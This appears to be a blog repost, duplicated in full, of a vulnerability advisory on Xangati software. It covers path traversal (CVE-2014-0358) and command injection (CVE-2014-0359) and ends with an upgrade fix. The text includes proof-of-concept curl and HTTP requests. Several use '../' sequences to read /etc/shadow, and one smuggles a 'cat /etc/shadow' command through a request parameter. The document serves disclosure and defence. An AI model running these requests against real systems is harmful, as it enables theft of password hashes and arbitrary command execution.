728x90
Overview
Xangati's software release contains relative path traversal (CWE-23) and command injection (CWE-78) vulnerabilities.
Description
Xangati's software release contains relative path traversal (CWE-23) and command injection (CWE-78) vulnerabilities.
CWE-23: Relative Path Traversal - CVE-2014-0358
The reporter has provided the following as a proof-of-concept. Authentication is not required to exploit these vulnerabilities.
curl -i -s -k -X 'POST' \
-H 'Content-Type: application/x-www-form-urlencoded' -H 'User-Agent: Java/1.7.0_25' \
--data-binary $'key=foo&request=getUpgradeStatus&file=%2Ffloodguard%2Freports%2F../../../../../etc/shadow' \
'hxxps://127.10.10.5/servlet/MGConfigData'
POST /servlet/MGConfigData HTTP/1.1
key=validkey&request=download&download=%2Ffloodguard%2Fdata%2F../../../../../../etc/shadow&updLaterThan=0&head=0&start=0&limit=4950&remote=127.10.10.5
POST /servlet/MGConfigData HTTP/1.1
key=validkey&request=port_svc&download=%2Ffloodguard%2Fdata%2F../../../../../../../etc/shadow&updLaterThan=0&remote=127.10.10.5
curl -i -s -k -X 'POST' \
-H 'Content-Type: application/x-www-form-urlencoded' -H 'User-Agent: Java/1.7.0_25' \
--data-binary $'key=validkey&falconConfig=getfile&file=%2Ffloodguard%2F../../../../../../../../../etc/shadow' \
'hxxps://127.10.10.5/servlet/Installer'
curl -i -s -k -X 'POST' \
-H 'Content-Type: application/x-www-form-urlencoded' -H 'User-Agent: Java/1.7.0_25' \
--data-binary $'key=validkey&binfile=%2Fourlogs%2F../../../../../../../../../etc/shadow' \
'hxxps://127.10.10.5/servlet/MGConfigData'
CWE-78: Improper Neutralization of Special Elements used in an OS Command - CVE-2014-0359
The reporter has provided the following as a proof-of-concept. Authentication is required to exploit this vulnerability.
curl -i -s -k -X 'POST' \
-H 'Content-Type: application/x-www-form-urlencoded' -H 'User-Agent: Java/1.7.0_25' \
--data-binary $'key=validkey&falconConfig=validateTest&path=%2Fvar%2Ftmp%2F¶ms=gui_input_test.pl¶ms=-p+localhost;CMD%3d$\'cat\\x20/etc/shadow\';$CMD;+YES' \
'hxxps://127.10.10.5/servlet/Installer'
The CVSS score below is for CVE-2014-0359.
Impact
A remote unauthenticated attacker may be able to read system files. A remote authenticated attacker may be able to run arbitrary system commands.
Solution
Apply an Update
Upgrade to XSR11 or XNR 7 for the appropriate product..
Vendor Information (Learn More)
Vendor Status Date Notified Date Updated
Xangati Inc Affected 23 Jan 2014 11 Apr 2014
If you are a vendor and your product is affected, let us know.
CVSS Metrics (Learn More)
Group Score Vector
Base 9.4 AV:N/AC:L/Au:N/C:C/I:C/A:N
Temporal 8.2 E:ND/RL:OF/RC:C
Environmental 2.1 CDP:ND/TD:L/CR:ND/IR:ND/AR:ND
References
https://cwe.mitre.org/data/definitions/78.html
https://cwe.mitre.org/data/definitions/23.html
http://xangati.com/products/
Credit
Thanks to Jan Kadijk for reporting this vulnerability.
This document was written by Jared Allar.
Other Information
CVE IDs: CVE-2014-0358 CVE-2014-0359
Date Public: 14 4월 2014
Date First Published: 14 4월 2014
Date Last Updated: 14 4월 2014
Document Revision: 11
Feedback
If you have feedback, comments, or additional information about this vulnerability, please send us email.
Xangati's software release contains relative path traversal (CWE-23) and command injection (CWE-78) vulnerabilities.
Description
Xangati's software release contains relative path traversal (CWE-23) and command injection (CWE-78) vulnerabilities.
CWE-23: Relative Path Traversal - CVE-2014-0358
The reporter has provided the following as a proof-of-concept. Authentication is not required to exploit these vulnerabilities.
curl -i -s -k -X 'POST' \
-H 'Content-Type: application/x-www-form-urlencoded' -H 'User-Agent: Java/1.7.0_25' \
--data-binary $'key=foo&request=getUpgradeStatus&file=%2Ffloodguard%2Freports%2F../../../../../etc/shadow' \
'hxxps://127.10.10.5/servlet/MGConfigData'
POST /servlet/MGConfigData HTTP/1.1
key=validkey&request=download&download=%2Ffloodguard%2Fdata%2F../../../../../../etc/shadow&updLaterThan=0&head=0&start=0&limit=4950&remote=127.10.10.5
POST /servlet/MGConfigData HTTP/1.1
key=validkey&request=port_svc&download=%2Ffloodguard%2Fdata%2F../../../../../../../etc/shadow&updLaterThan=0&remote=127.10.10.5
curl -i -s -k -X 'POST' \
-H 'Content-Type: application/x-www-form-urlencoded' -H 'User-Agent: Java/1.7.0_25' \
--data-binary $'key=validkey&falconConfig=getfile&file=%2Ffloodguard%2F../../../../../../../../../etc/shadow' \
'hxxps://127.10.10.5/servlet/Installer'
curl -i -s -k -X 'POST' \
-H 'Content-Type: application/x-www-form-urlencoded' -H 'User-Agent: Java/1.7.0_25' \
--data-binary $'key=validkey&binfile=%2Fourlogs%2F../../../../../../../../../etc/shadow' \
'hxxps://127.10.10.5/servlet/MGConfigData'
CWE-78: Improper Neutralization of Special Elements used in an OS Command - CVE-2014-0359
The reporter has provided the following as a proof-of-concept. Authentication is required to exploit this vulnerability.
curl -i -s -k -X 'POST' \
-H 'Content-Type: application/x-www-form-urlencoded' -H 'User-Agent: Java/1.7.0_25' \
--data-binary $'key=validkey&falconConfig=validateTest&path=%2Fvar%2Ftmp%2F¶ms=gui_input_test.pl¶ms=-p+localhost;CMD%3d$\'cat\\x20/etc/shadow\';$CMD;+YES' \
'hxxps://127.10.10.5/servlet/Installer'
The CVSS score below is for CVE-2014-0359.
Impact
A remote unauthenticated attacker may be able to read system files. A remote authenticated attacker may be able to run arbitrary system commands.
Solution
Apply an Update
Upgrade to XSR11 or XNR 7 for the appropriate product..
Vendor Information (Learn More)
Vendor Status Date Notified Date Updated
Xangati Inc Affected 23 Jan 2014 11 Apr 2014
If you are a vendor and your product is affected, let us know.
CVSS Metrics (Learn More)
Group Score Vector
Base 9.4 AV:N/AC:L/Au:N/C:C/I:C/A:N
Temporal 8.2 E:ND/RL:OF/RC:C
Environmental 2.1 CDP:ND/TD:L/CR:ND/IR:ND/AR:ND
References
https://cwe.mitre.org/data/definitions/78.html
https://cwe.mitre.org/data/definitions/23.html
http://xangati.com/products/
Credit
Thanks to Jan Kadijk for reporting this vulnerability.
This document was written by Jared Allar.
Other Information
CVE IDs: CVE-2014-0358 CVE-2014-0359
Date Public: 14 4월 2014
Date First Published: 14 4월 2014
Date Last Updated: 14 4월 2014
Document Revision: 11
Feedback
If you have feedback, comments, or additional information about this vulnerability, please send us email.
728x90
'취약점 정보1' 카테고리의 다른 글
| Adobe Reader for Android exposes insecure Javascript interfaces (0) | 2014.04.15 |
|---|---|
| PaperThin CommonSpot CMS contains multiple vulnerabilities (0) | 2014.04.15 |
| Artiva Agency Single Sign-On (SSO) feature vulnerability (0) | 2014.04.15 |
| Juniper ScreenOS 서비스거부 취약점 주의 권고 (0) | 2014.04.15 |
| 2014-04-15 취약점 정리 (0) | 2014.04.15 |